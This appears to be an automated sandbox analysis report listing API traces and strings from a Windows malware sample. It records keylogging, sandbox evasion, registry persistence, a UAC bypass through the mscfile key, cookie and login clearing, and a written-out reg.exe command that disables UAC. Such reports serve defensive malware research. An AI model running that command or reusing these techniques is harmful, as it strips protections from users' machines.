                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@$?resize@?$basic_string@BufferCreateDirectoryHeaderOpenPrepareStartatoi
                              • String ID:
                              • API String ID: 1105965448-0
                              • Opcode ID: 1c0ea7c4ecf195e60b421314d626c75882c3edba1827f109d9b046417a45d593
                              • Instruction ID: bf27eddb9491d6ca11d4abd4b36827af5ed132d13cec366d9f467bf0129c0db4
                              • Opcode Fuzzy Hash: 1c0ea7c4ecf195e60b421314d626c75882c3edba1827f109d9b046417a45d593
                              • Instruction Fuzzy Hash: D221E371E50A00FBC7469F65EC4CBDA7AA4FBC8315B50813AE905D62B0EBF94880CB4C
                              APIs
                              • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0040E779
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 0040E78E
                              • InternetReadFile.WININET(?,?,00002710,?), ref: 0040E7B9
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E7CE
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E821
                              • InternetCloseHandle.WININET(?), ref: 0040E84F
                              • InternetCloseHandle.WININET(?), ref: 0040E854
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$??2@CloseHandleOpen$FileRead
                              • String ID: user
                              • API String ID: 2072504707-2375276105
                              • Opcode ID: 2ee8c07cc1f150707620ff4239a6abc9e9cbbd7c46878338fda33a680a787436
                              • Instruction ID: eb539ee71474eb75c57a488c0914650f16280e3af79cc5ff73f90012e5c67050
                              • Opcode Fuzzy Hash: 2ee8c07cc1f150707620ff4239a6abc9e9cbbd7c46878338fda33a680a787436
                              • Instruction Fuzzy Hash: 5F317932900228ABCF25DF69D885ADF7BA5FF09350F14806AF909A7290C6749A54DB94
                              APIs
                              • CreateEventA.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 004042BF
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668,?,?,?,00000000,00000000,00000000,00000000), ref: 004042D2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,onlinelogs,00415268,?), ref: 004042F5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404302
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00404317
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668,?,?,?,?,?,?), ref: 00404323
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000), ref: 0040432E
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@0@V?$basic_string@$D@2@@std@@Hstd@@$??1?$basic_string@??4?$basic_string@??9std@@CreateEventObjectSingleV01@V10@0@V10@@Wait
                              • String ID: onlinelogs
                              • API String ID: 3814545256-2085248552
                              • Opcode ID: f8ba56530e54795d1a185f62b9b80f38ef3ca3acce3b7b9791dac6e42c8a8b2b
                              • Instruction ID: dcc0d7a04b3077ee23eca2ee736643480c7622a3ab28667727a229d9fd835d7f
                              • Opcode Fuzzy Hash: f8ba56530e54795d1a185f62b9b80f38ef3ca3acce3b7b9791dac6e42c8a8b2b
                              • Instruction Fuzzy Hash: 0601D2B1500208BFC750AB74DE49DEB7BBCFF85304B10067AF902A2691DAB89D488779
                              APIs
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415968,00000000,00415940), ref: 00402B87
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402B90
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,00000000), ref: 00402BAB
                                • Part of subcall function 00408F64: RegOpenKeyExA.ADVAPI32(80000001,00406AD4,00000000,00020019,00406AD4), ref: 00408F7E
                                • Part of subcall function 00408F64: RegQueryValueExA.ADVAPI32(00406AD4,?,00000000,00000000,?,80000001,80000001), ref: 00408F9A
                                • Part of subcall function 00408F64: RegCloseKey.ADVAPI32(00406AD4), ref: 00408FA5
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00402BD6
                                • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                • Part of subcall function 00408FDA: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00402BF5
                                • Part of subcall function 00409132: RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00000002,80000002,?,00406E1F,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000), ref: 00409143
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$CloseOpenValue$??0?$basic_string@??1?$basic_string@?length@?$basic_string@?size@?$basic_string@CreateD@1@@Query
                              • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                              • API String ID: 1049763294-2313358711
                              • Opcode ID: 52d834ad7dbe387af31c16091ba16812ba16630a9bf9eb5042469d97c8839c8f
                              • Instruction ID: ce9100f12018cb41e6333c8ca2a80e1a56526989df9abf25ad7ef470a405d909
                              • Opcode Fuzzy Hash: 52d834ad7dbe387af31c16091ba16812ba16630a9bf9eb5042469d97c8839c8f
                              • Instruction Fuzzy Hash: 5511CA71A002547BDB0163A89C99BEF776D9B85300F0441B7F945E22C1DAB85E8647DD
                              APIs
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001C,00415978,00000000,00415940,004075A2,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401013
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040103B
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001F,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401060
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401085
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000021,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010AA
                              • CreateThread.KERNEL32(00000000,00000000,004011F8,00000000,00000000,00000000), ref: 004010C0
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000022,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010D1
                              • CreateThread.KERNEL32(00000000,00000000,00401216,00000000,00000000,00000000), ref: 004010E5
                                • Part of subcall function 004010F1: GetModuleHandleA.KERNEL32(SbieDll.dll,00401025,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010F6
                                • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,00410560,00415978,00415940), ref: 00401259
                                • Part of subcall function 00401234: exit.MSVCRT ref: 00401263
                                • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,0041055C,00000001,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401278
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@U?$char_traits@V?$allocator@$?data@?$basic_string@D@2@@std@@$??8std@@CreateD@2@@0@ThreadV?$basic_string@$HandleModuleexit
                              • String ID:
                              • API String ID: 3827955099-0
                              • Opcode ID: 886a64f9d97f4e7677d0af7a9acbcbccb3fe7bc9225a759a474fba55b627c5cf
                              • Instruction ID: 5b21bb54b2fce72050f5962a4a3546230b449f07c752eed21346b36d0e69d07d
                              • Opcode Fuzzy Hash: 886a64f9d97f4e7677d0af7a9acbcbccb3fe7bc9225a759a474fba55b627c5cf
                              • Instruction Fuzzy Hash: EF21F12064128066EA2537B26D1EAAF1A1A4BC6705B0400FFF582BF2E2DE7D4CC1D66D
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040F8D9
                                • Part of subcall function 0040F978: RegisterClassExA.USER32(00000030), ref: 0040F9BE
                                • Part of subcall function 0040F978: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0040F9D9
                                • Part of subcall function 0040F978: GetLastError.KERNEL32(?,00000000), ref: 0040F9E3
                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0040F910
                              • lstrcpynA.KERNEL32(00415BC8,00000040), ref: 0040F928
                              • Shell_NotifyIconA.SHELL32(00000000,00415BB0), ref: 0040F93E
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040F951
                              • TranslateMessage.USER32(?), ref: 0040F95B
                              • DispatchMessageA.USER32(?), ref: 0040F965
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                              • String ID:
                              • API String ID: 1970332568-0
                              • Opcode ID: 2786fddfdab5fbc73eaeb84a67dd41f479d7273ef5a77b00e14b6c4e5329e6b6
                              • Instruction ID: 6c70321501f622e291cef7a2b269b544ec8077eec463a2dcd1f5d48526f3bc04
                              • Opcode Fuzzy Hash: 2786fddfdab5fbc73eaeb84a67dd41f479d7273ef5a77b00e14b6c4e5329e6b6
                              • Instruction Fuzzy Hash: BF111FB2806619EBD7109B91EC48EEB3B7CFB89354F008176B615E2190D7B8A545CBAC
                              APIs
                              • RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                              • RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040903C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                              • String ID:
                              • API String ID: 2159132150-0
                              • Opcode ID: c96356cb78dfb9d80db60ec6b5f7434fb2546494d656b3e51b260e3425f17090
                              • Instruction ID: da37749cfa3f05033a32fbbd08786c797a634bef9566a04a8c5ae3221e21c764
                              • Opcode Fuzzy Hash: c96356cb78dfb9d80db60ec6b5f7434fb2546494d656b3e51b260e3425f17090
                              • Instruction Fuzzy Hash: DA016932000009AFCF009F90FD889EA3B69FF18355B008075F90A92060DB729D64CB58
                              APIs
                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,00415968,00000000), ref: 004084F6
                              • CloseHandle.KERNEL32(?), ref: 00408505
                              • CloseHandle.KERNEL32(?), ref: 0040850A
                              Strings
                              • C:\Windows\System32\cmd.exe, xrefs: 004084F1
                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004084EC
                              • D, xrefs: 004084CD
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CreateProcess
                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                              • API String ID: 2922976086-1747066916
                              • Opcode ID: a99085f489ab2e170cca9d3e23119def7522f92bfbabe080ea7c5488701c172d
                              • Instruction ID: 49ef00a26c30989ba7ed88d2a65af69d250c14a9bd2b913ba13855b573ed4d5e
                              • Opcode Fuzzy Hash: a99085f489ab2e170cca9d3e23119def7522f92bfbabe080ea7c5488701c172d
                              • Instruction Fuzzy Hash: F0F0D0B69005187EEB409BE5DC05EFFBB7DE748710F104421FB01F6160D6B469498A65
                              APIs
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00415268,00000000,6A3F5E04), ref: 0040DE7B
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DE88
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000), ref: 0040DE98
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040DEA1
                              • atoi.MSVCRT ref: 0040DEA8
                                • Part of subcall function 0040DA55: GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000,76E50440,00415268,6A41AFB0), ref: 0040DA80
                                • Part of subcall function 0040DA55: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,76E50440,00415268,6A41AFB0), ref: 0040DA94
                                • Part of subcall function 0040DA55: GetProcAddress.KERNEL32(00000000), ref: 0040DA9B
                                • Part of subcall function 0040DA55: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(76E50440,00415268,6A41AFB0), ref: 0040DAB3
                                • Part of subcall function 0040DA55: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DABC
                                • Part of subcall function 0040DA55: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DAC6
                                • Part of subcall function 0040DA55: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040DB68
                                • Part of subcall function 0040DA55: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040DB86
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DEB9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DEC2
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$??1?$basic_string@?size@?$basic_string@V12@$??0?$basic_string@?find@?$basic_string@?length@?$basic_string@?substr@?$basic_string@AddressD@1@@GdiplusLibraryLoadProcStartupatoi
                              • String ID:
                              • API String ID: 4181878723-0
                              • Opcode ID: 44cda1b0aba01f95a7190a095bd5c6faa0b09c69638a034032fd8e8976cd13aa
                              • Instruction ID: a53c021e27954d43d5d070e7438e4a07455e2c0535f708b4c7a5eec2c33dd71b
                              • Opcode Fuzzy Hash: 44cda1b0aba01f95a7190a095bd5c6faa0b09c69638a034032fd8e8976cd13aa
                              • Instruction Fuzzy Hash: CFF01272500119EBCB04AFA4EC4D9DE7778FB44315B108575F917970A0DFB49984CB58
                              APIs
                              • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000), ref: 0040ED82
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040ED8C
                              • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?,00000000), ref: 0040ED95
                              • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040ED9F
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040EDA9
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2), ref: 0040EDBF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?), ref: 0040EDC8
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                              • String ID:
                              • API String ID: 2478582372-0
                              • Opcode ID: adb46ca283450cb9f2384b23b62c3c9c57bbe05b8ad4d32cfd432fa645a760be
                              • Instruction ID: 1564fe7f85c29674afeedc34bac84888193373dfe958ee75c0cfd53d5d2b696a
                              • Opcode Fuzzy Hash: adb46ca283450cb9f2384b23b62c3c9c57bbe05b8ad4d32cfd432fa645a760be
                              • Instruction Fuzzy Hash: 71F0AF7550010EABCB04EFA0D95D9EE7778FF44305F008465F91697190DBB49E49CB65
                              APIs
                              • EnumWindows.USER32(0040C8F3,00000000), ref: 0040C9EB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,windowslist,00415268,00415A20), ref: 0040CA09
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415A20), ref: 0040CA13
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415A20), ref: 0040CA28
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668,?,?,?,?,?,00415A20), ref: 0040CA38
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@??4?$basic_string@EnumV01@V01@@V10@0@V10@@Windows
                              • String ID: windowslist
                              • API String ID: 1943122135-3779825983
                              • Opcode ID: b547f61fa1d04b115500ff6018a40232aa2c76acc4097e1a31bcc498f6059ffc
                              • Instruction ID: fd0eb6cd70df32150fd7f84368215a10c343f41110055329f562a51080181c44
                              • Opcode Fuzzy Hash: b547f61fa1d04b115500ff6018a40232aa2c76acc4097e1a31bcc498f6059ffc
                              • Instruction Fuzzy Hash: A0E0E571AC0218ABD20073A46D4BFEE3B18FA91705F404672FA02711D1EAFC18D882AE
                              APIs
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,6A41AFB0,6A41AFB0,?,0040C5C2,?,00000000), ref: 0040EE57
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EE65
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,0040C5C2,?,00000000), ref: 0040EE87
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,0040C5C2,?,00000000), ref: 0040EEA9
                                • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,0040C5C2,?,00000000), ref: 0040EEBD
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040C5C2,?,00000000), ref: 0040EEC6
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@free
                              • String ID:
                              • API String ID: 1231779380-0
                              • Opcode ID: 8d267b30505027ac71a5795a797b7f15db73b80b7f14e4256d31203b5d1ac008
                              • Instruction ID: b993cd5d2c3ead3800f1df18077c746f948359e482093e15d73946b3c0281b93
                              • Opcode Fuzzy Hash: 8d267b30505027ac71a5795a797b7f15db73b80b7f14e4256d31203b5d1ac008
                              • Instruction Fuzzy Hash: 8F01803220011D9BCB18EB78EC998EF77AAFB88265740443DF907D7290EE709D45CB94
                              APIs
                              • Sleep.KERNEL32 ref: 00405E8C
                              • Sleep.KERNEL32(00001388), ref: 00405EFE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared all cookies & stored logins!],?), ref: 00405F28
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410D48,00000001), ref: 00405F4C
                                • Part of subcall function 00405D53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 00405D64
                                • Part of subcall function 00405D53: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405D8B
                                • Part of subcall function 00405D53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405D94
                                • Part of subcall function 00405D53: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00405DA3
                                • Part of subcall function 00405D53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E1A
                                • Part of subcall function 00405D53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405E67
                              Strings
                              • [Cleared all cookies & stored logins!], xrefs: 00405F23
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
